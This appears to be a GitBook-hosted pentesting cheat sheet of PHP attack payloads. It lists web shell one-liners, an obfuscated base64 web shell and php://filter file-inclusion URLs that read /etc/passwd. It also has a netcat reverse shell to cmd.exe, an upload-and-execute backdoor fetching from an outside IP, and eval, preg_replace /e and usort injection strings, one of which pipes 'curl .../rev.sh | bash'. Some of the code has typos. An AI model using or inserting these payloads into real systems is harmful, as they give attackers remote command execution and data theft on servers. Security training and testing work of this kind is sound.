> For the complete documentation index, see [llms.txt](https://web.tipsytux.in/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://web.tipsytux.in/services/templating-engines.md).

# Templating Engines

### Basic Backdoor

```php
# Simple One Liner
<?php system($_GET['cmd']);?>

# Simple passthru
<pre><?php passthru($_GET['cmd']); ?></pre>

# A little better
<?php
    $cmd = $_GET["cmd"];
    if(isset($cmd)){
        echo "<pre>" . shell_exec($cmd) . "</pre>";
    }
    die();
?>
```

***

### PHP Filters

```php
<http://10.10.199.203/index.php?err=php://filter/resource=/etc/passwd>
<http://ip/page.php?file=filter/read=string.rot13/resource=/etc/passwd>
<http://ip/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd>
```

***

### PHP Data

```php
<http://ip/page.php?file=data://text/plain;base64,QW9DMyBpcyBmdW4hCg==>
```

***

### Code Execution

{% code overflow="wrap" %}

```php
<?php file_put_contents('nc.bat',file_get_contens('<http://ip/nc.txt'));system('nc.bat');usleep(2000000);system('nc.exe> -vn hostIp 1234 -e cmd.exe'); ?>
```

{% endcode %}

***

### Exploit Modification

Suppose we are modifying any exploit, and we want to app PHP, we can use the below code

{% code overflow="wrap" %}

```php
$phpCode = <<< 'EOD'
<?php
  if (isset($_REQUEST['fupload'])){
    file_put_contents($_REQUEST['fupload'],file_get_contents("<http://10.10.14.9/>" . $_REQUEST['fupload']));
  };
  if (isset($_REQUEST['fexec'])){
    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
  };
?>
EOD;
#This can be used to set data fields in payloads to be executed. alternatively
#we can also use this as just a php code.
```

{% endcode %}

This can be used to upload and execute files.

***

### Code Obfuscation

<https://www.gaijin.at/en/tools/php-obfuscator>

Can be used to obfuscate the PHP.

Url Encoded Bash Ready PHP-

{% code overflow="wrap" %}

```php
<?php \\$p0=\\$_GET[base64_decode('d3JlYXRo')];if(isset(\\$p0)){echo base64_decode('PHByZT4=').shell_exec(\\$p0).base64_decode('PC9wcmU+');}die();?>
```

{% endcode %}

***

### Code Injection

#### Eval

We can try to work on our payloads using:

1. “.” this should help in string concatenation
2. “./*comment*/”. this is adding a comment and should not change anything.

```php
".system('uname -a'); $dummy="
".system('uname -a');#
".system('uname -a');//
```

***

#### using Replace

If we have something like this:

```php
swearwords[/shit/i]=poop
```

Then this can be used for command injection

```php
swearwords[/shit/e]=system('curl <http://10.13.14.4/rev.sh> | bash"";'
```

***

#### usort

The function `usort` is often used with the function `create_function` to dynamically generate the "sorting" function, based on user-controlled information. If the web application lacks potent filtering and validation, this can lead to code execution.

```php
<?php usort(VALUE, "cmp"); #Being cmp a valid function ?>
VALUE: );phpinfo();#

<?php usort();phpinfo();#, "cmp"); #Being cmp a valid function ?>
```

```php
<?php
function foo($x,$y){
    usort(VALUE, "cmp");
}?>
VALUE: );}[PHP CODE];#

<?php
function foo($x,$y){
    usort();}phpinfo;#, "cmp");
}?>
```

You can also use **//** to comment the rest of the code.

To discover the number of parentheses that you need to close:

* `?order=id;}//`: we get an error message (`Parse error: syntax error, unexpected ';'`). We are probably missing one or more brackets.
* `?order=id);}//`: we get a **warning**. That seems about right.
* `?order=id));}//`: we get an error message (`Parse error: syntax error, unexpected ')' i`). We probably have too many closing brackets.

This is based on a vulnerability in PHPMyAdmin: **CVE-2008-4096**

***


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://web.tipsytux.in/services/templating-engines.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.